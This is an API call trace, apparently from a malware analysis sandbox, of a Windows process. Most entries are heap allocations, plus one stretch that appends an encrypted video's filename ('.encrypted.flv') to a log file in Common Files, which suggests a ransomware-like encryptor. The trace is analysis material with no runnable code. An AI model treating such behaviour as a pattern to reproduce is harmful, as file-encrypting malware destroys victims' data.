hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0041.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0041.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0041.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0041.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.985] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.985] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0041.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0041.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0041.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0041.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.986] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0041.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xaa0008 [0041.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0041.986] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0041.986] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.986] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0041.986] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.986] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.986] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0041.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.987] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0041.987] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x32e9, lpOverlapped=0x0) returned 1 [0041.987] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0041.987] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x32e9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0041.987] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0041.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.encrypted.flv\r\n", cchWideChar=59, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 59 [0041.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x3b) returned 0x7ab338 [0041.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.encrypted.flv\r\n", cchWideChar=59, lpMultiByteStr=0x7ab338, cbMultiByte=59, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\S24Ya.encrypted.flv\r\n", lpUsedDefaultChar=0x0) returned 59 [0041.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0041.987] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0041.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0041.987] WriteFile (in: hFile=0x128, lpBuffer=0x7ab380*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7ab380*, lpNumberOfBytesWritten=0x6aee3c*=0x3a, lpOverlapped=0x0) returned 1 [0041.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0041.987] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.987] CloseHandle (hObject=0x128) returned 1 [0041.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0041.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0041.988] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab0028 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0041.990] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0041.990] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791268 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0041.990] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.991] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.991] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0041.991] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.991] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0041.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0041.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.991] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.991] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0041.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0041.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5b8 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0041.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca48 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14b8 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0041.992] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0041.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0041.992] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0041.992] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0041.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0041.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0041.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0041.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0041.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0041.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.993] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.993] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0041.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0041.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0041.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0041.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.994] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.994] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0041.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0041.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0041.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0041.995] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0041.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0041.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.995] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0041.995] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.996] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0041.996] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.996] 